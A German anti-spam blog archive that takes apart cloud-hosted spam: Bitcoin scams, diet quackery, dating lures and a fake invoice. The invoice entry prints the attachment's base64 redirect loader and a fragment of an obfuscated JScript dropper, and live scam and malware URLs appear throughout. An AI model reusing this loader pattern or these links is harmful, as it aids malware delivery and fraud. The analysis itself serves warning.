Schlagwortarchiv „Cloud“

Ohne Betreff

Donnerstag, 2. Februar 2023

Heute habe ich es zum ersten Mal geschafft, eine derartige Spam…

https://1drv.ms/w/s!AnDdU2-UFXyEgR38iQlfCMh1z6PR

…rechtzeitig wahrzunehmen, also noch bevor Microsoft den verlinkten Inhalt aus seinem „Cloud“-Dienst gelöscht hat. Und das heißt, dass ich endlich mal sagen kann, was in diesen kryptischen Spams ohne Betreff, aber mit Link in Microsofts „Cloud“, so drinsteht. 💡️

$ mime-header 'https://1drv.ms/w/s!AnDdU2-UFXyEgR38iQlfCMh1z6PR'
HTTP/1.1 301 Moved Permanently
Location: https://onedrive.live.com/redir?resid=847C15946F53DD70!157&authkey=!APyJCV8IyHXPo9E&ithint=file%2cdocx
X-MSNSERVER: DB3PPF6CC9BCC04
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: +EIJlvS8cUG3sv2fucBgyA.0
X-AsmVersion: UNKNOWN; 19.1074.105.2010
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: C5916954D1E94930BFB4E53CF1D45EAC Ref B: DUS30EDGE0919 Ref C: 2023-02-02T12:01:17Z
Date: Thu, 02 Feb 2023 12:01:17 GMT
Connection: close
Content-Length: 0
$ _

Leider ist es nicht leicht möglich, diese Datei an der Kommandozeile herunterzuladen, weil die „Cloud“-Anfixer und digitalen Gutsherren von Microsoft einen großen Haufen Javascript gelegt haben, um einfache und direkte technische Möglichkeiten zu verhindern und die Benutzung eines voll aufgeplusterten Webbrowsers zu erzwingen. Na gut, dann eben über die virtuelle Maschine, die ich für solche Momente vorhalte (und auf der sich Kriminelle gern austoben dürfen). 🧸️

Was man dort herunterladen kann, ist ein Dokument für Microsoft Word…

$ file invite-jCB5MMu0I.docx 
invite-jCB5MMu0I.docx: Microsoft Word 2007+
$ _

…das auch aussieht, und zwar so:

Krass, ein „Click here“ in der Spam, der auf einen in proprietärer Software verbuddelten „Click here“ in der Cloud führt, und meine Freunde und Bekannten waren so doof, dass sie darauf rumgeklickt haben. Mit denen muss ich aber mal ein sehr ernstes Wort sprechen… 🤭️

Natürlich ist nicht einmal dieser indirekte Link in einem Cloud-Dokument direkt gesetzt. Hier wird noch einmal über Bitly und daran anschließend noch einige Weiterleitungen maskiert, wo die Reise hingehen soll. 🎭️

$ location-cascade https://bit.ly/3WLriKQ
     1	https://z3xvg.app.link/sF1RXMkWYwb
     2	http://ucuiwwa.contractproduction.co.in/23525662423763622?_branch_match_id=1149668583144555590&utm_medium=marketing&_branch_referrer=H4sIAAAAAAAAA8soKSkottLXrzKuKEvXSywo0MvJzMvWL3YzDIrwzQ6PLE8CAFnhhGEiAAAA
     3	http://de.personorganisation.co.in/tr/vip/DE/7011/?bet=28368923&affsub2=hot
$ _

Damit ist das Versteckspiel noch lange nicht am Ende. Die Website, bei der man schließlich ankommt, zieht es vor…

$ lynx -dump http://de.personorganisation.co.in/
                                403 Forbidden
     __________________________________________________________________

                                nginx/1.10.3
$ _

…gar keine Startseite zu haben. Man muss schon die ganze URL mit Parametern und Affiliate-ID des Spammers verwenden, um schließlich…

$ lynx -dump "http://de.personorganisation.co.in/tr/vip/DE/7011/?bet=28368923&affsub2=hot" | sed 8q
   Bitcoin Code

   Reite auf der Erfolgswelle des Bitcoins und du kannst bis zu €13.000 in
   den nächsten 24h verdienen

   Lass mich dir jetzt

live zeigen wie man sich Cash verdient!
$ _

…auf der altbekannten Betrugsseite „Bitcoin Code“ zu landen, die ihren Bullshit seit 2017 im Wesentlichen unverändert präsentiert. Die paar Darstellungsfehler, die offenbar bei etwas zu hastigen Umzügen auf neue Server entstanden, sind mir keinen neuen Screenshot wert. Wichtigster Inhalt neben traumhaft schönen Bildern vom Reichtum ist das Video des spammigen Reichwerdexperten Sven Hegel, ebenfalls seit Jahren unverändert. 🥱️

Warum sollte man daran auch etwas verändern. Es läuft ja schon seit Jahren, und eine Neugestaltung der Betrugsnummer wäre doch mühsam. Wenn die Spammer sich Mühe geben wollten, könnten sie ja gleich arbeiten gehen! 🛠️

Offenbar finden sich immer noch genug „ungebrannte Kinder“, denen man erzählen kann, dass sich jeder dahergelaufene Honk klicki-klicki das Geld aus der Steckdose ziehen kann. Das ist natürlich nicht wahr. Tatsächlich ist es ein Betrug. Das Geld, das man da reinsteckt, ist weg. Und die tollen Zahlen, die einem in der App angezeigt werden, sind nur Zahlen. Der persönliche Berater allerdings, der irgendwann anruft und empfiehlt, weil es gerade so gut läuft, noch mehr Geld hinterherzuschmeißen, der ist echt. Er ist ein gewerbsmäßiger Betrüger. Am Ende wird er noch eine sehr gesalzene Gebühr nehmen, wenn man sein angezeigtes Geld auch abholen will, und dann bricht der Kontakt einfach ab. Viele merken erst in diesem Moment, dass sie betrogen wurden und dass das Geld jetzt weg ist. 💸️

Bitte nicht auf solche Reichwerdexperten aus der Spam reinfallen! Man kann mit Geld etwas Besseres anfangen, als solchen asozialen Verbrechern den verfeinerten Lebensstil zu finanzieren. Ich nehme mal an, dass hier jedem etwas einfällt… 😉️

『Das Ende der Ära des Übergewichts!』

Mittwoch, 28. Dezember 2022

Häh, was macht ihr denn für lustige Zeichen in den Betreff? Glaubt ihr etwa, dass eure Quacksalber-Spam damit besser aussieht? 🤭️

Von: 𝓚𝓾𝓷𝓭𝓮𝓷𝓭𝓲𝓮𝓷𝓼𝓽 <0DYIOLLR48K9IVYGOGPD@googlegroups.com>
An: [to]

Ja, ihr scheint da einen ganz komischen Glauben zu haben. Normale Menschen verwenden ja die ganz normalen alphabetischen Zeichen in Unicode, die man direkt auf der Tastatur tippen kann, mit denen jede Software klarkommt und die man sich sogar vom Computer vorlesen lassen kann. Aber nein, das hier sind Spammer. Die haben weder Klarheit noch Vernunft auf der Prioritätenliste stehen, denen gehts nur um den Verkauf ihrer (im besten Fall) völlig wirkungslosen Gesundheitsprodukte an leichtgläubige Menschen. Und so sieht es dann auch immer aus. 😁️

14kg in einem Monat!

JETZT ZUM ANGEBOT! >>

Hören diese Spams eigentlich niemals auf? 😩️

Das Bild hosten die Spammer nicht selbst. Es wurde anonym und kostenlos in der Google-Cloud abgelegt. Die Spammer bieten ihre „revolutionäre“ Methode nicht über eine Website an, sondern über Spam und Spam und Spam, und deshalb können sie das Bild nicht selbst hosten.
Im Bild sieht man das Logo von „Die Höhle der Löwen“. Die Sendung, in der dieses Produkt vorgestellt wurde, hat es niemals gegeben. Inzwischen schreiben Spammer nicht mehr „die Höhle der Löwen“ in den Text, sondern verwenden es nur noch in Bildern. Vermutlich bin ich nicht der einzige Mensch gewesen, der gemerkt hat, dass dieser Text beinahe nur noch in Spam vorkommt, so dass ich diese Fluten mit einer ganz einfachen Regel zum Nullgerät senden kann. Dass die Marke „Höhle der Löwen“ von Spammern nachhaltig beschädigt wurde, ist den Spammern egal. Denen ist alles egal, solange ihr eigenes Geschäft läuft. Die sind asozial und kriminell.
Um abzunehmen, muss man nicht mehr in sich hineinkippen, sondern weniger. Um ein Kilogramm Fett abzubauen, muss man rd. 9.000 Kilokalorien weniger lecker Energie in den Mund stecken, als man verbraucht. Das ist mit einem starken Unlustgefühl verbunden. Der Volksmund spricht vom „Hunger“. Aber eine andere Methode gibt es nicht. Der Bauch ist keine physikfreie Zone. Wer mir das nicht glauben möchte, weil ich nur ein dahergelaufener Blogger bin, frage bitte einfach einen richtigen Arzt! Aber auf keinen Fall auf solche Betrüger reinfallen! Im Februar habe ich mich noch etwas ausführlicher ausgelassen.
Um 14 Kilogramm Fett innerhalb eines Monats abzubauen, müsste man während dieses Monats jeden Tag rd. 4.200 Kilokalorien mehr verbrauchen als man über das Essen aufnimmt (Wer mir nicht glaubt, greife bitte zum Taschenrechner!). Um in die Nähe eines solchen Energieumsatzes zu kommen, muss man schon Leistungssportler oder Schwerarbeiter sein. Dazu dann auch eine Mangelernährung zu machen, überlebt man keinen Monat lang.
Noch schneller verbrennt man das Fett, wenn man sich mit Benzin übergießt und anzündet. Das Wort „Fettverbrennung“, das einen mühelos von allein ablaufenden Vorgang suggeriert, findet sich nur in den Spams und in der Reklame von Quacksalbern.
Ein funktionierendes Gehirn, das sich nicht jeden Betrug andrehen lässt, ist viel wichtiger als ein attraktives Aussehen und eine schlanke Figur. Selbst, wenn es überhaupt keine Kenntnisse hat (wer weiß schon die Energiedichte von Fett), sieht ein funktionierendes Gehirn beim Anblick einer derartigen Spam sofort, dass es alles Lüge sein muss. Warum? Weil dem funktionierenden Gehirn klar wird, dass ein derartiges Medikament, wenn es wirklich wie angepriesen wirkte, nicht über illegale und asoziale Spam vermarktet werden müsste. Fettleibigkeit ist nämlich eine Volkskrankheit. Ein wirksames Medikament wäre ein Bombengeschäft. Es wäre bei seiner Markteinführung ein Thema in sämtlichen Massenmedien, die ersten unglaublichen Erfolgsgeschichten wären ein Thema in sämtlichen Massenmedien, und es würde sich wie von selbst verkaufen. Aber trotzdem hinge überall die Reklame dafür. Auch, wenn man geistig so entlegen lebt wie ich (kein Fernsehen, wirksamer Werbeblocker im Web, kein Rundfunk, Presseprodukte nur über Umwege, denn ich hänge sehr an meiner geistigen Gesundheit in schwierigen Zeiten), würde man in Gesprächen davon erzählt bekommen. Und zwar begeistert. Weil es wirkt. Weil es ein Problem löst, das viele Menschen über Jahre hinweg oder gar ihr ganzes Leben lang haben und dank ihrer psychisch höchst ungesunden Konkurrenz zu den Photoshopmonstern der Werber und PR-Leute noch mehr Menschen zu haben glauben. Wir haben es nicht gehört? Obwohl es in der „Höhle der Löwen“ gelaufen sein soll? Na, wie kommt das wohl… 😉️
Gegen zwei sehr schlimme, ziemlich teure und das ganze Leben vernichtende Leiden haben die Quacksalber aus der Spam niemals ein Mittel: Gegen Leichtgläubigkeit und gegen Hirnträgheit.

Also bitte nicht auf solche Spams reinfallen! 💡️

Sign in to 📊 GET 0.43 BTC – CLICK HERE

Sonntag, 27. November 2022

Oh, ich kriege BTC geschenkt. Grundlos. Weil meine Mailadresse so schön ist. Und „Click here“ steht sogar schon im Betreff! 🏆️

Wer in so eine Spam klickt, lasse alle Hoffnung fahren! 🔥️

Hello,

Genau mein Name! 👍️

We received a request to sign in to 📊 GET 0.43 BTC – CLICK HERE using this email address.

Was ist das denn für ein tolles Englisch? „Wir haben eine Anfrage erhalten, uns mit dieser Mailadresse bei ‚Erhalten Sie 0,43 BTC, klick mal auf klick mal‘ anzumelden“? (Das ist schon geglättet übersetzt.) Von mir habt ihr die „Anfrage“ jedenfalls nicht. Ich verwende Bitcoin nicht. Ich will auch nicht. Aus Umweltschutzgründen¹. 🌍️

If you want to sign in with your sag@ich.net² account, click this link:

Sign in to 📊 GET 0.43 BTC – CLICK HERE

Die verlinkte Web-Adresse ist nicht nur ein bisschen kryptisch, sondern auch ein bisschen lang. Sie besteht aus insgesamt 590 Zeichen. Die Domain, in welche dieser Link führt…

$ host hwvkar0cqi.page.link
hwvkar0cqi.page.link has address 142.250.185.129
hwvkar0cqi.page.link has IPv6 address 2a00:1450:4001:810::2001
$ whois 142.250.185.129 | grep -i ^org | sed 5q
Organization:   Google LLC (GOGL)
OrgName:        Google LLC
OrgId:          GOGL
OrgTechHandle: ZG39-ARIN
OrgTechName:   Google LLC
$ _

…wird beim dicksten Freund und Komplizen des Spammers und Betrügers, bei Google, gehostet. Vermutlich in der „Cloud“, die ja jetzt hipp, modern, zukunft und digital ist und uns jeden Tag ganz viele first world problems zu lösen verspricht, die ich noch nie als Probleme empfunden habe. (Schon gar nicht, seit Datenträger billig und leicht transportierbar geworden sind.) Aber nach regelmäßigem Datengenuss an einem so genannten smart phone scheint sich das Gehirn neu zu verdrahten und dann fängt man langsam an, ganz anders zu „denken“ und sich dabei auch noch für ganz schlau zu halten… ich sehe es ja auch jeden verdammten Tag im Straßenverkehr. 😁️

Auf eine Abuse-Meldung habe ich bei Google schon lange keine Lust mehr. Ich stehe nicht so auf Kafka-Erfahrungen. Die wollen nichts gegen Spam tun, sondern vielmehr die Kosten ihrer gratis angebotenen Dienstleistungen der ganzen Welt aufbürden, aber den Reibach für sich behalten. Google ist schon längst selbst zur Spam geworden. ☹️

If you did not request this link, you can safely ignore this email.

Ach, das ist aber nett! 🤭️

Thanks,

Danke für den pseudohöflichen Dank für nichts! Du mich auch! 🖕️

Your 📊 GET 0.43 BTC – CLICK HERE team

Was für ein tolles Team! 😂️

Entf! 🗑️

¹Ja, wirklich. Der Energieverbrauch für jede einzelne Bitcoin-Transaktion ist so absurd hoch, dass ich die Verwendung von Bitcoin für unverantwortbar halte. Und das wird mit zunehmender Nutzung nicht etwa besser, sondern nur schlimmer.

²Mailadresse geändert.

I liked it so much… I want more

Freitag, 4. November 2022

These girls want to find a guy

< 1 / 5 >
Open her profile Cheraghearzu 10 miles from you

So so, dieses keck präsentierte Möslein¹ ist also nur zehn Meilen von mir entfernt? Was für Meilen sind es denn? Seemeilen, englische Meilen, sächsische Landvermessermeilen, metrische skandinavische Meilen oder deutsche Landmeilen? Nicht, dass das einen großen Unterschied machte, denn der Abstand zu mir ist allemal groß genug. Obwohl: Zehn Lichtjahre wären noch besser. 😉️

Die Links in der Spam führen übrigens alle in die Google-Cloud², denn das kostet den Spammer ja kein Geld. Dort ist ein PDF abgelegt, das in seiner gar nicht zur drastisch-deutlichen Mail passenden Unschärfe wohl sicher durch die automatischen Pornofilter bei Google kommt. Das PDF hat nur eine Seite, und die sieht so aus:

Was, Dating? Mit einer Spammerin? Och nö! 🤭️

Was von irgendwelchen Dating-Websites zu halten ist, auf denen es nur Frauen gibt, sollte eigentlich jedem Menschen mit Gehirn klar sein: Es ist Betrug. Die Frauen existieren nicht. Man hat es die ganze Zeit mit Bots oder mit Animateuren zu tun, die oft zwei Dutzend Leute gleichzeitig bespaßen. Das Geld, mit dem man die gesalzenen Preise bezahlt, geht an Kriminelle. Persönliche Daten, die man angibt (mit sexuellen Interessen, lecker!) werden an andere Kriminelle verkauft. Interessierte Frauen sind Trickbetrügerinnen, die einem noch mehr Geld aus der Tasche ziehen. Ich will es mal so sagen: Das Bordell ist preiswerter, und da gibt es etwas für das Geld. 💸️

Wer mir das nicht glaubt, kann sich ja mal fragen, was diese Frauen eigentlich immer machen, dass es dort keine Männer gibt… 🙃️

Die lustige „Frucht des Jugendschutzes“ im Foto aus der Spam ist natürlich von mir eingefügt, im pornografischen Originalbild hat nichts den Blick auf die Vulva verstellt.

²Ich habe den Missbrauch bei Google gemeldet und bin mal gespannt, ob Google inzwischen mehr Interesse an der Bekämpfung von Spam und Internetkriminalität hat. Kostenlose Cloud-Angebote als Hilfsmittel der Spammer werden in den nächsten Jahren eine Pest.

Ihre Rechnung 146648577349 von der Böttcher AG

Freitag, 30. September 2022

⚠️ Warnung, Schadsoftware! Auf gar keinen Fall den Anhang klicken! ⚠️

Von: Böttcher AG <no-reply@glenat.com>
An: undisclosed-recipients: ;

So so, eine Rechnung, die an ganz viele Empfänger auf einmal geht. 😂️

Natürlich kommt diese Spam nicht von der Böttcher AG, sondern von schwerkriminellen Spammern, die Rechner anderer Leute mit Schadsoftware übernehmen wollen. Bevorzugt kleine und mittelständische Unternehmen. Denen droht dann oft die Insolvenz, und dann werden Erpresser halt bezahlt. 😕️

Ihre Rechnungsnummer: 146648577349
Ihre Kundennummer: 646756981732962

Lieber Kunde,

Hach, so viele schöne Zahlen, aber der einzige Name, den ich habe, ist „Lieber Kunde“. Die scheinen ihre Kunden aber nicht zu mögen. 😁️

beiliegend erhalten Sie Ihre Rechnung als HTML-Dokument.

Ah ja! Da ist ja tatsächlich ein Anhang dran. Da steht aber nicht so viel drin. Der ist nur eine Weiterleitung zu einer base64-codierten URL. Na gut, fange ich mal an – wie üblich arbeite ich mit meiner Kommadozeile unter Linux:

$ cat Rechnung-b-a_0000003198.html 
<body id="kqisC2MKfeohSuvlhlQyUmZZdlUGTxyDYNrBPoW05qdsUurHk2yYsHp4DgvqGBSbC5Aut1qSVdJDugOkeNeshVsoPBGnbKJ3UCLXYnFs4Bu" onpageshow="document.location.href=window.atob('aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M=');">
$ echo aHR0cHM6Ly8zdDguYXQvYXBEOHFsb1M= | base64 -d; echo 
https://3t8.at/apD8qloS
$ mime-header https://3t8.at/apD8qloS | grep -i ^location
location: https://info-opensocial.googleusercontent.com/gadgets/ifr?url=https://hatcherlawgroup.com/img/inf/inf
$ _

Ab jetzt geht es nur noch mit einem richtigen Browser weiter, weil zum Zugriff auf die gängelnde und gefährliche Google-Cloud leider Javascript benötigt wird. Ja, dieser hochgefährliche Sondermüll wird anonym und kostenlos in der Cloud eines Google-Kontos gehostet. Ist es nicht „schön“, wie einfach das alles geworden ist? Hier ist längst ein Paradies für Kriminelle entstanden. Ich habe mir mal den Spaß gemacht und in einer virtuellen Maschine den Download gemacht. Die Datei ist ein ZIP-Archiv, das es in sich hat:

$ ls -lh *.zip
-rw-rw-r– 1 elias elias 96K Sep 30 15:21 5640955135.zip
$ zip -sf 5640955135.zip 
Archive contains:
  xi1132111.js
Total 1 entries (418953 bytes)
$ unzip 5640955135.zip 
Archive:  5640955135.zip
  inflating: xi1132111.js  
$ _

Dettelbach ist überall! 😱️

Diese Datei ist kein Dokument, sondern Programmcode, der nach klicki-klicki Doppelklick vom Windows Script Host ausgeführt wird. Dieser Programmcode ist ausgesprochen kryptisch formuliert und…

$ wc xi1132111.js 
     2    373 418953 xi1132111.js
$ _

…steht in lediglich zwei Zeilen, die aber insgesamt rd. 420 Kilobyte Javascript-Programmcode enthalten. 😮️

Um einen Eindruck davon zu vermitteln, wie vorsätzlich schwierig analyisierbar und kryptisch dieses Programm gecodet ist, gebe ich hier mal das erste Kilobyte aus und füge nach jedem Komma einen Zeilenumbruch ein, damit man es noch bequem lesen kann:

$ dd status=none if=xi1132111.js bs=1024 count=1 | sed 's/,/,\n/g'; echo 
function _0×3cd5(){var _0×11cf11=['\x2f\x67\x2c\x66\x5b\x31\x46\x5d\x29\x29\x3b\x31\x67\x3d',
'\x6a\x70\x66\x57\x51',
'\x79\x5c\x5a\x22\x2c\x22\x5c\x6a\x5c\x6d\x22\x2c\x22\x5c',
'\x56\x6b\x72\x7a\x62',
'\x5c\x6b\x22\x2c\x22\x5c\x74\x5c\x31\x62\x22\x2c\x22\x5c',
'\x4f\x6f\x4d\x6c\x57',
'\x4d\x41\x58\x41\x73',
'\x5c\x63\x5c\x68\x5c\x73\x5c\x63\x5c\x59\x5c\x63\x5c\x63',
'\x75\x5d\x2b\x66\x5b\x31\x76\x5d\x2b\x66\x5b\x31\x6d\x5d',
'\x61\x5c\x62\x5c\x62\x5c\x61\x5c\x62\x5c\x53\x5c\x4a\x5c',
'\x6a\x61\x61\x67\x70',
'\x7c\x7a\x6d\x42\x45\x6f\x52\x53\x64\x7c\x78\x34\x42\x7c',
'\x61\x77\x6e\x6c\x69',
'\x49\x65\x52\x45\x67',
'\x5c\x73\x5c\x63\x5c\x43\x5c\x63\x5c\x70\x5c\x61\x5c\x69',
'\x72\x4d\x79\x54\x48',
'\x49\x6d\x77\x47\x67',
'\x42\x69\x74\x77\x49',
'\x5c\x75\x5c\x6e\x5c\x6d\x5c\x72\x5c\x61\x5c\x64\x5c\x6b',
'\x77\x7a\x77\x47\x71',
'\x61\x5c\x62\x22\x2c\x22\x5c\x65\x5c\x61\x5c\x62\x5c\x64',
'\x5c\x6b\x22\x2c\x22\x5c\x6a\x5c\x55\x5c\x70\x5c\x61\x5c',
'\x5c\x2b\x5c\x2b\x20\x2a\x28\x3f\x3a\x5b\x61\x2d\x7a\x41',
'\x5c\x6f\x5c\x78\x5c\x63\x5c
$ _

Von einem neuronalen Netzwerk generiertes Bild einer verlassenen industriellen Anlage, die überall mit Blut verschmiert ist So etwas führt man doch gern auf seinem Computer aus, gelle? Vor allem, wenn es aus einer fragwürdigen Mail kommt, die von einer Rechnung faselt, aber nicht einmal eine persönliche Ansprache beinhaltet. Natürlich sollte man solchen Code nicht ausführen, auch nicht, wenn man dafür nur eine Datei doppelklicken muss. Man sollte generell E-Mail nur mit der Kneifzange anfassen. E-Mail ist sehr praktisch, das aber leider auch für Kriminelle. Wer niemals einen Anhang öffnet, der nicht vorher über ein anderes Medium als E-Mail explizit abgesprochen wurde, tut viel für seine Computersicherheit. 🛡️

Es wird sich mit an Sicherheit grenzender Wahrscheinlichkeit um Schadsoftware handeln. Diese Schadsoftware ist die neueste Brut der Kriminellen, sie wird im Moment nur von einem sehr kleinen Bruchteil der Antivirus-Programme erkannt. Zur Verdeutlichung habe ich auch einen Screenshot von VirusTotal von heute, 15:54 Uhr gemacht, weil ich hoffe, dass sich die Erkennungsrate schon in den nächsten Stunden deutlich verbessert. Das gesamte Antivirus-Schlangenöl wird also einmal mehr nicht helfen. 💀️

Vermutlich sind jetzt bereits die Netzwerke von hunderten bis tausenden Betrieben von Kriminellen übernommen worden, und in Kürze werden überall die Erpressungstrojaner Geld einfordern. Das wird Kosten verursachen und vielleicht sogar die eine oder andere Insolvenz zur Folge haben. 😵️

Auf eine Abuse-Meldung bei Google habe ich verzichtet. Ich bin nicht so ein Freund kafkaesker Erfahrungen. Stattdessen habe ich die giftige Mail an das Landeskriminalamt Niedersachsen weitergeleitet. 👮‍♂️️

Sobald Ihre Ware (Lagerware) unser Logistikzentrum verlassen hat, erhalten Sie per E-Mail eine Versandbenachrichtigung mit Link zur Sendungsverfolgung.

Den Status Ihrer Bestellung können Sie jederzeit in unserem Onlineshop www.bueromarkt-ag.de unter Mein Konto – Meine Bestellungen einsehen.
Fehlende Artikel werden automatisch nachgeliefert.

Wenn Sie einen Artikel zurücksenden möchten, nutzen Sie bitte unsere Online-Rückgabe unter Mein Konto – Rücksendung & Reklamation.

Für Rückfragen stehen wir Ihnen gern zur Verfügung.
Vielen Dank für Ihren Auftrag.

Bitte antworten Sie nicht auf diese Nachricht, da sie automatisch von einem Postfach generiert wurde, welches keine eingehenden e-Mails empfangen kann.

Mit freundlichen Grüßen

⚠️ Bitte auf gar keinen Fall darauf reinfallen! ⚠️

=?UTF-8?Q?=EF=BB=BF?=

Montag, 22. August 2022

Oh, mal wieder ein Spammer, der damit überfordert ist, das Encoding für den Betreff anzugeben. 🤦‍♂️️

Und, was schreibt dieser Idiot? 🤔️

https://1drv.ms/w/s!AjhqRCBzfr8uay1pJ9y0YaINhWk

Einen Link schreibt der Idiot. Ohne Kontext. Einfach ein Link zum Anklicken, weil ein Link aus einer Spam immer so schön angeklickt werden kann. So ein feiner Link! Für die Zielgruppe „Vielleicht kommt ja ein leckerer Keks aus dem Computer, wenn man auf den Link klickt“. 🎯️

Hoffentlich ist niemand so dumm, auf so einen Link zu klicken! Es ist sowieso gefährlich, in eine E-Mail zu klicken¹, und es ist noch viel gefährlicher, wenn diese E-Mail zwei Kilometer gegen den Wind nach illegaler und asozialer Spam stinkt. 🖱️⚠️

Es geht direkt in die Microsoft-“Cloud“. Dort ist ein Word-Dokument abgelegt. Der Spammer konnte wohl nicht anders. In der E-Mail war kein Platz mehr. Er muss unbedingt mal Mailpapier nachbestellen. 🤡️

Das Word-Dokument sieht auch aus, und zwar so:

Der Text mit dem blauen Hintergrund ist ein Link, darauf kann man dann noch einmal klicken. Vermutlich war im Word-Dokument auch kein Platz mehr. 😁️

Wer das macht, landet auf der Website in einer Domain…

$ surbl de.heavyexperience.link
de.heavyexperience.link	LISTED: ABUSE
$ lynx -dump http://de.heavyexperience.link/DE/1730/?bet=28368923 | sed -n 15,30p
             Hunderte von Menschen in Deutschland reich werden.

   (ZEIT) – Deutscher chemiker Joachim Sauer ist dafür bekannt, dass er
   immer sagt, was er denkt und ehrlich zugibt, wie er sein Geld verdient.

   Letzte Woche trat er bei Late Night Berlin auf und kündigte ein neues
   "Vermögensschlupfloch" an, das seiner Ansicht nach jeden innerhalb von
   3-4 Monaten in einen Millionär verwandeln kann. Müller forderte alle in
   Deutschland auf, diese erstaunliche Gelegenheit zu nutzen, bevor die
   Großbanken sie endgültig zum Erliegen bringen. Joachim riet allen
   Deutschen, diese fantastische Möglichkeit zu nutzen, bevor sie von den
   Großbanken permanent blockiert wird.

   Und tatsächlich rief die Deutsche Bank Minuten nach Beendigung des
   Interviews an und versuchte, die Ausstrahlung von Sauer' Interview zu
   verhindern – aber es war schon zu spät.
$ _

…die schon längst wegen massenhafter Spam auf allen Blacklists dieser Welt steht. Das hindert den Betreiber dieser Website aber nicht daran, trotz der völlig unpassenden Domain so zu tun, als sei er die „Zeit Online“. Allerdings wollen die Inhalte nicht so gut passen, denn hier wird nur ellenlang und mit Fotos, die eher nach hirnloser Gossenpresse aussehen, erzählt, wie jedes Suppenhuhn vollautomatisch und ohne jede Kenntnisse mit Bitcoin-Spekulation und dem „Gewinn code System“ von Spamboy Silas Schmidt reich werden kann:

Natürlich ist das alles Lüge. Man kann sich nicht einfach Geld aus der Steckdose ziehen. Das Geld, dass man auf der angeblichen Bitcoin-Plattform einzahlt, ist futsch. Die angezeigten Zahlen kann man nicht auszahlen lassen. Wenn man es versucht, soll man noch eine Gebühr bezahlen, damit noch mehr Geld futsch ist. Es ist ein Betrug. 💸️

Aber das es kriminell ist, sieht man ja schon an der illegalen und asozialen Spam. 💡️

¹Das gilt auch, wenn man dem Absender vertraut, denn die Absenderadresse einer E-Mail kann beliebig gefälscht werden. Deshalb sollte man digitale Signaturen verwenden. Und niemals in eine E-Mail klicken, die nicht digital signiert ist oder nicht über einen anderen Kanal als E-Mail vereinbart wurde. Dettelbach ist überall.

Gewinne jetzt einen Einkaufgutschein im Wert von 100�!

Freitag, 10. Juni 2022

Hey, Spammer! Wenn man schon zu doof ist, das Encoding für den Betreff richtig anzugeben, dann könnte man ja einfach „€“ als „Euro“ ausschreiben, und schon sieht es nicht mehr lächerlich aus. Aber leider hast du die Flucht ergriffen, als der Verstand verteilt wurde. 🤭️

Da reißt es dann auch das tolle Bild [habe ich auch in Originalgröße] nicht mehr raus. Zumal das Bild auch seine Schwächen hat; kleine Fehler, die der echten Deutschen Bahn niemals passieren würden. Zum Beispiel der rote Streifen am ICE. Der ist jetzt schon seit ein paar Jahren grün, wie man übrigens in jeder Reklame der Deutschen Bahn sehen kann. Aber woher sollst du das wissen? Du willst ja nicht bahnfahren, du willst von Spam-Gewinnspielen leben. Oder genauer gesagt: Vom Missbrauch eingesammelter Daten, mit denen du deine Betrugsnummern und deinen Datenhandel machst. 🤢️

Und wenn dann im Betreff von einem „Einkaufsgutschein“ und in der eigentlichen Spam von einer „Jahreskarte der Deutschen Bahn“ die Rede ist, dann wird jedem Menschen mit einem Intelligenzquotienten über der Zimmertemperatur klar, dass du dir mit deinem Schmeißfliegengehirn nicht einmal während des Schreibens deiner asozialen, kriminellen Drecksspam merken kannst, um was es eigentlich in deinem eigenen Betrug gehen soll. 🤣️

Herzlichen Glückwunsch!
$salutation_de_gender

Genau mein Name! 👏️

Spammer, du Dickdarmakrobat! Halten wir mal fest: Mit der Angabe eines Encodings für den Betreff bist du intellektuell überfordert; ein Betreff, der irgendwie wenigstens so gut zum Inhalt deiner Spam passt, dass da nichts völlig anderes steht, ist dir nicht eingefallen; beim schnellen Zusammenkopieren eines tollen Bildchens für deinen Schwindel zeigt sich, dass du die Marke, in deren Namen du spammst, überhaupt nicht kennst; und das Spamskript, das du für deine Spamaktion benutzt, hast du auch nicht richtig verstanden. Vielleicht solltest du einfach nicht spammen. Vielleicht solltest du einfach etwas tun, was deiner geistigen Entwicklung näherkommt. Zum Beispiel Zombie-Darsteller. Da brauchtest du dich nicht zu verstellen, könntest daran nicht scheitern und löstest beim Betrachten nicht so viel Heiterkeit aus. 😁️

Das Glück war auf Ihrer Seite! Ihre E-Mail-Adresse wurde ausgesucht, um an unserem Gewinnspiel teilzunehmen. Sie haben die wundervolle Chance ein Deutsche Bahn Jahresticket 1. Klasse zu gewinnen! Egal, ob Arbeitsweg, Schulweg oder Urlaub. Die Bahn bringt Sie dort hin.

Das ist ja toll, dass ich – oder genauer: meine E-Mail-Adresse – die Chance habe, etwas zu gewinnen. Nur gewonnen habe ich nichts. Egal, ob Dummheit, Idiotie, Blödgier oder Betrug: Leere Versprechungen von Spammern bringen mich dort hin. Und der ICE bringt mich zur Schule. Ideal für Kinder mit Schulwegen über zweihundert Kilometer. 🚆️

Ich hoffe, dass inzwischen jeder Mensch bemerkt hat, dass diese Spam nicht von der Deutschen Bananenbahn kommt. Sie kommt von einem asozialen Spammer. Und wer darauf reinfällt und…

Was Sie tun müssen? Ganz einfach. Bestätigen Sie einfach Ihre Teilnahme, indem Sie auf den unten stehenden Button klicken.

Aber warten Sie nicht zu lange! Das Gewinnspiel endet, sobald alle Gewinner ausgelost wurden.

Herzliche Grüße

Der Wettbewerb richtet sich nur an Personen, die in Deutschland leben und über 18 Jahre alt sind.

Ja, ich will mitmachen

…klicki-klicki macht, weil er in einer E-Mail dazu aufgefordert wurde, der hat verloren. Natürlich führt der Link nicht in die Domain der Deutschen Bahn, sondern zur viel weniger Vertrauen erweckenden Domain waltcheck (punkt) com, die bereits…

$ surbl waltcheck.com
waltcheck.com	LISTED: ABUSE
$ _

…wegen Spam auf allen einschlägigen Blacklists steht. 💀️

Zurzeit wird die betrügerische Website…

$ host waltcheck.com
waltcheck.com has address 34.76.75.249
$ whois 34.76.75.249 | grep -i ^comment
Comment:        *** The IP addresses under this Org-ID are in use by Google Cloud customers *** 
Comment:        
Comment:        Direct all copyright and legal complaints to 
Comment:        https://support.google.com/legal/go/report
Comment:        
Comment:        Direct all spam and abuse complaints to 
Comment:        https://support.google.com/code/go/gce_abuse_report
Comment:        
Comment:        For fastest response, use the relevant forms above.
Comment:        
Comment:        Complaints can also be sent to the GC Abuse desk 
Comment:        (google-cloud-compliance@google.com) 
Comment:        but may have longer turnaround times.
Comment:        
